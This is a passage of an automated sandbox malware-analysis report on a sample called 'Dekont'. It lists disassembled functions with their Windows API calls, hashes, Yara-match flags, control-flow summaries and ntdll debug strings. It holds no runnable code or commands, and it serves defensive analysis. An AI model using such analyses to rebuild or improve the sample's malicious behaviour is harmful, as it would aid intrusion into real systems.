                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                  • Instruction Fuzzy Hash: 9CF015B2210208ABCB14DF89CC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                                  Function 0041A460 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction ID: e9450f8bec15428cdd91297f97b7848412804bda5c7d31b3f0e5b01193c95e83
                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction Fuzzy Hash: 3CD01776211214ABD710EB99CC85EE77BACEF48764F15449ABA189B242C530FA1186E0
                                  Function 01012B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3e8f3ec52f11535eace4375cad759f4ca1b5eb9f7ce1a6397a2a4876fbc54e4f
                                  • Instruction ID: dd754bb06ac1b9f4610601d9edbc15c01cf4c357e3a413a22ef1c295321a5f5b
                                  • Opcode Fuzzy Hash: 3e8f3ec52f11535eace4375cad759f4ca1b5eb9f7ce1a6397a2a4876fbc54e4f
                                  • Instruction Fuzzy Hash: DA90026520241003510571588415616404A97E0201B55C023E1414590DC92589916225
                                  Function 01012BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7de64d3803967406c5a0a23e5523aeea122c27aed1f8fec2c811927c01bb281d
                                  • Instruction ID: 4fe63a00a4be0024fd57aba884b3010c971f63af07bb69cd712ce4058d61e024
                                  • Opcode Fuzzy Hash: 7de64d3803967406c5a0a23e5523aeea122c27aed1f8fec2c811927c01bb281d
                                  • Instruction Fuzzy Hash: 8790023520141802E1807158840564A004597D1301F95C017E0425654DCE158B5977A1
                                  Function 01012AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3b8d594fd12de6e19464b2166f4cae904f5e45be844d7b23b98ac1f8b8b8a89e
                                  • Instruction ID: d0156dccc6ae95293941641556d3737e543448917a460826ce6980ff56b0d90d
                                  • Opcode Fuzzy Hash: 3b8d594fd12de6e19464b2166f4cae904f5e45be844d7b23b98ac1f8b8b8a89e
                                  • Instruction Fuzzy Hash: E390043D311410031105F55C470550700C7D7D5351355C033F1415550CDF31CD715331
                                  Function 01012D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 6891d6307d4f78afa2fcee63fedbd34aa51450db2dc33716b2db0892eef27ff6
                                  • Instruction ID: c3cf024e06e49e4ddee9466f68f0c7e867b81275493c19ac3b5b571fb67449da
                                  • Opcode Fuzzy Hash: 6891d6307d4f78afa2fcee63fedbd34aa51450db2dc33716b2db0892eef27ff6
                                  • Instruction Fuzzy Hash: 0E90022D21341002E1807158940960A004597D1202F95D417E0415558CCD1589695321
                                  Function 01012D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: aaed31ae4da270e37c8c708284157ba1a0d7515e884c467139434d80c346f89a
                                  • Instruction ID: d8ebbb31bc3a49616ca96507c8482fb27d5b30155ca99e02d789936076ac7782
                                  • Opcode Fuzzy Hash: aaed31ae4da270e37c8c708284157ba1a0d7515e884c467139434d80c346f89a
                                  • Instruction Fuzzy Hash: C890022530141003E140715894196064045E7E1301F55D013E0814554CDD1589565322
                                  Function 01012DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 05d7eaf061c073286f01e418d7f3a66a304c205f36349670b3d76eac5115d3d6
                                  • Instruction ID: 00fb22163256ffa892a9cbfe4bf3258e3ea6cd9868fab347864d447fea579c74
                                  • Opcode Fuzzy Hash: 05d7eaf061c073286f01e418d7f3a66a304c205f36349670b3d76eac5115d3d6
                                  • Instruction Fuzzy Hash: 88900225242451526545B15884055074046A7E0241795C013E1814950CC9269956D721
                                  Function 01012DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c524d55bed16988747190510f92a2c6a5e4851b6c425a999b2d0fd05f47a5593
                                  • Instruction ID: 878c1edef1d81f86843d81f4c17fc7275c5fe1784a9511e119b1210cf383faf2
                                  • Opcode Fuzzy Hash: c524d55bed16988747190510f92a2c6a5e4851b6c425a999b2d0fd05f47a5593
                                  • Instruction Fuzzy Hash: 4690023520141413E11171588505707004997D0241F95C413E0824558DDA568A52A221
                                  Function 01012C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3ab6f707a0c3effd480b288aacdb5b09599be8c5b1bbbad29d9f58a75ee6cd56
                                  • Instruction ID: 22facdadc443f6bc523918e2782283a3cc7b2fc9b3fa93944b1aa6f4cad0a35f
                                  • Opcode Fuzzy Hash: 3ab6f707a0c3effd480b288aacdb5b09599be8c5b1bbbad29d9f58a75ee6cd56
                                  • Instruction Fuzzy Hash: 9890023520149802E1107158C40574A004597D0301F59C413E4824658DCA9589917221
                                  Function 01012CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 8102e20002ef530551060bc4393558bd1ccfc29925d6986788c3d136287179f6
                                  • Instruction ID: f7152b03a16edd69a1e3ee7c39b89249f6e3e5d641a734102aa9540022df17f1
                                  • Opcode Fuzzy Hash: 8102e20002ef530551060bc4393558bd1ccfc29925d6986788c3d136287179f6
                                  • Instruction Fuzzy Hash: A490023520141402E10075989409646004597E0301F55D013E5424555ECA6589916231
                                  Function 01012F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 720c6ee61882a5f21006f8210c1a299d2485d68a91a5f15d717d0bde797daf1a
                                  • Instruction ID: 1546566b5aa6f57a083bf1d229b1416257f862b39af602856981d8a8dcb742aa
                                  • Opcode Fuzzy Hash: 720c6ee61882a5f21006f8210c1a299d2485d68a91a5f15d717d0bde797daf1a
                                  • Instruction Fuzzy Hash: C390026534141442E10071588415B060045D7E1301F55C017E1464554DCA19CD526226
                                  Function 01012F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d026c17d6c587e38ad3d6f1e8ad7f96675e193ce1ab79ff1a542b76f67ca6bf4
                                  • Instruction ID: 1ae9b2c476b5baa758cb28ea6ef0b2e4d791ac57ac29be1b0899c33d32da219e
                                  • Opcode Fuzzy Hash: d026c17d6c587e38ad3d6f1e8ad7f96675e193ce1ab79ff1a542b76f67ca6bf4
                                  • Instruction Fuzzy Hash: 6090023520181402E1007158881570B004597D0302F55C013E1564555DCA2589516671
                                  Function 01012FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 763da88d428b97dbbc804880d5e5395f02dae8e51aba0bcbc915a358e467e138
                                  • Instruction ID: 9c71a9c58fad713519c862a5b8b221eacab6302ff142424941f9429585b61919
                                  • Opcode Fuzzy Hash: 763da88d428b97dbbc804880d5e5395f02dae8e51aba0bcbc915a358e467e138
                                  • Instruction Fuzzy Hash: 739002256014104251407168C8459064045BBE1211755C123E0D98550DC95989655765
                                  Function 01012FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 704b2051ef1cc55bf324cc7858b8478bc54a70737a813636f2385279b8cc461e
                                  • Instruction ID: 1dbcc1f4c02f86b81ac21260f78da48b6a648aee0c86b93e42d6aaaae5733f1e
                                  • Opcode Fuzzy Hash: 704b2051ef1cc55bf324cc7858b8478bc54a70737a813636f2385279b8cc461e
                                  • Instruction Fuzzy Hash: 8C900225211C1042E20075688C15B07004597D0303F55C117E0554554CCD1589615621
                                  Function 01012E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 4f37ec8c70b66c99716d3fe1dfea648b3efe50e5289f0d466f0a9759d353542c
                                  • Instruction ID: d9c29f200c4e00805b7e07dbfc98bd5fab988fff48a1ec2866f6a8a72002a2d6
                                  • Opcode Fuzzy Hash: 4f37ec8c70b66c99716d3fe1dfea648b3efe50e5289f0d466f0a9759d353542c
                                  • Instruction Fuzzy Hash: C290022560141502E10171588405616004A97D0241F95C023E1424555ECE258A92A231
                                  Function 01012EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: fe561a7df4c6609879f15383cc7774aa20e7f7a10171b1db23581a72e311db38
                                  • Instruction ID: 71a6ccf7f8235422c68420fea74a26f72053c2d7f57205dc6fa895cca77994d4
                                  • Opcode Fuzzy Hash: fe561a7df4c6609879f15383cc7774aa20e7f7a10171b1db23581a72e311db38
                                  • Instruction Fuzzy Hash: C190027520141402E14071588405746004597D0301F55C013E5464554ECA598ED56765
                                  Function 00409AB0 Relevance: .1, Instructions: 92COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9491f0743c91a206193bdf4875b0116748c1939b63dea1d6f13f2d0be6304ac3
                                  • Instruction ID: 0cf1d1cfbff413d406b9f50454d57ab941c4b3e8ec75440de5a7d7d7e128ebbb
                                  • Opcode Fuzzy Hash: 9491f0743c91a206193bdf4875b0116748c1939b63dea1d6f13f2d0be6304ac3
                                  • Instruction Fuzzy Hash: 24210AB2D4020857CB25D664AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                  Function 0041A632 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 11 41a632-41a639 12 41a6a3-41a6a8 ExitProcess 11->12 13 41a63b 11->13 14 41a5f6-41a5fd 13->14 15 41a63d 13->15 17 41a61b-41a631 RtlAllocateHeap 15->17 18 41a63f 15->18 18->12
                                  APIs
                                  • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A62D
                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateExitHeapProcess
                                  • String ID: 6EA
                                  • API String ID: 1054155344-1400015478
                                  • Opcode ID: 47508782786a64f1a4d8e9ee814f552b76b8f1e01370df25776678557343657f
                                  • Instruction ID: f3a8626008191923e07bac595a229e4eb5614c867216e2dd50514f9d6a1fbb57
                                  • Opcode Fuzzy Hash: 47508782786a64f1a4d8e9ee814f552b76b8f1e01370df25776678557343657f
                                  • Instruction Fuzzy Hash: 6CE0C27510B1983AEB18A7B03E858F77F1DC8C121472C4AEAFACC9E407C429916283A6
                                  Function 0041A600 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 19 41a600-41a631 call 41af30 RtlAllocateHeap
                                  APIs
                                  • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A62D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID: 6EA
                                  • API String ID: 1279760036-1400015478
                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                  • Instruction ID: 226561cf9c8a986873ffc081809f26ad69fcc4b20f94c9d7be20fabd3b8eb7db
                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                  • Instruction Fuzzy Hash: 24E012B1211208ABDB14EF99CC41EA777ACAF88664F118559BA085B242C630F911CAB0
                                  Function 0041A5C6 Relevance: 1.6, APIs: 1, Instructions: 64memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 217 41a5c6-41a5cc 218 41a59d-41a5a7 call 41af30 217->218 219 41a5ce 217->219 223 41a5ac-41a5c1 call 1012c70 218->223 221 41a5d0-41a5fd call 41af30 219->221 222 41a64b-41a657 call 41af30 219->222 227 41a65c-41a671 RtlFreeHeap 222->227 228 41a5c3-41a5c5 223->228
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: 151e719e1fe50e17b4ef87342ef9202b6ccf1721b88ce42bd16b803d403f5492
                                  • Instruction ID: 710bbcc343550d2e60226a4eb97f5427688d4fc6556b828fe111e3aabe4103ba
                                  • Opcode Fuzzy Hash: 151e719e1fe50e17b4ef87342ef9202b6ccf1721b88ce42bd16b803d403f5492
                                  • Instruction Fuzzy Hash: 6E11C2B92053046FDB14EFA8DC81CEB77A8EF84318B40854AFC5947302D234E962CBB5
                                  Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 231 408310-40833d call 41be30 call 41c9d0 236 408343-40835a call 414e50 231->236 237 40833e call 40acf0 231->237 240 40835c-40836e PostThreadMessageW 236->240 241 40838e-408392 236->241 237->236 242 408370-40838a call 40a480 240->242 243 40838d 240->243 242->243 243->241
                                  APIs
                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: 1eae49b1dd1fdf1f4ed343fddf3187855c82dbc596373200d6923005f005e771
                                  • Instruction ID: 43d593e10ad008c4695c17d6314bf6f3e92d4c432431edd93db89b762a987e15
                                  • Opcode Fuzzy Hash: 1eae49b1dd1fdf1f4ed343fddf3187855c82dbc596373200d6923005f005e771
                                  • Instruction Fuzzy Hash: E2018471A8032877E720A6959D43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                  Function 004082D3 Relevance: 1.6, APIs: 1, Instructions: 52threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 246 4082d3-4082df 247 4082e1-4082fd call 41b870 call 41b720 246->247 248 408337-40835a call 40acf0 call 414e50 246->248 257 40835c-40836e PostThreadMessageW 248->257 258 40838e-408392 248->258 259 408370-40838a call 40a480 257->259 260 40838d 257->260 259->260 260->258
                                  APIs
                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: 7c12312fb9c11a5d82f084d113b032006b16db5ca1e92a579f808e6171a4af43
                                  • Instruction ID: 967da45d43d500b0c3c5d9e15febe837a69d4a3a08b03dd864461a48f287fc59
                                  • Opcode Fuzzy Hash: 7c12312fb9c11a5d82f084d113b032006b16db5ca1e92a579f808e6171a4af43
                                  • Instruction Fuzzy Hash: F1017D32A4032932E62166653D43FFA730C9B41F64F04017FFE04FB2C1EAA9A91142EA
                                  Function 0041A640 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 287 41a640-41a656 288 41a65c-41a671 RtlFreeHeap 287->288 289 41a657 call 41af30 287->289 289->288
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                  • Instruction ID: 3f65de21c9b51a2b7742007d51c6b1fad19b07b0b1b2c98d2bb582ee848745b4
                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                  • Instruction Fuzzy Hash: 1EE046B1210208ABDB18EF99CC49EE777ACEF88764F018559FE085B242C630F911CAF0
                                  Function 0041A7A0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 290 41a7a0-41a7d4 call 41af30 LookupPrivilegeValueW
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7D0
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                  • Instruction ID: a195d06a74d451d332e2306e76e7c3aa502b90bd3f16d73f11471c4c6d802808
                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                  • Instruction Fuzzy Hash: 2FE01AB12102086BDB10DF49CC85EE737ADAF88654F018155BA0857241C934E8118BF5
                                  Function 0041A680 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                  Download Yara Rule
                                  APIs
                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                  • Instruction ID: 026b6f0270740822b369349059f6971daea101c61a9fac8a7aff4918670f7806
                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                  • Instruction Fuzzy Hash: C1D017726112187BD620EB99CC85FD777ACDF487A4F0180AABA1C6B242C531BA11CAE1
                                  Function 01012C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7ad33ff2d8c33428c824d7c3d5be4975cb1bb4ae87ca871e9c54d9c97845f75d
                                  • Instruction ID: cfd3c5d19cc9785e4aad433826abc04ef75b5389ad52f6f698d0910ebde52f26
                                  • Opcode Fuzzy Hash: 7ad33ff2d8c33428c824d7c3d5be4975cb1bb4ae87ca871e9c54d9c97845f75d
                                  • Instruction Fuzzy Hash: 3FB09B719015D5C6EA51E7644609717794077D0701F25C063D3430641F473CC1D1E275

                                  Non-executed Functions

                                  Function 01088D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Strings
                                  • The resource is owned shared by %d threads, xrefs: 01088E2E
                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01088E86
                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01088F26
                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01088F2D
                                  • The resource is owned exclusively by thread %p, xrefs: 01088E24
                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01088DB5
                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01088DA3
                                  • write to, xrefs: 01088F56
                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01088E3F
                                  • Go determine why that thread has not released the critical section., xrefs: 01088E75
                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01088F34
                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01088D8C
                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01088DD3
                                  • *** enter .exr %p for the exception record, xrefs: 01088FA1
                                  • *** Inpage error in %ws:%s, xrefs: 01088EC8
                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01088E4B
                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 01088E02
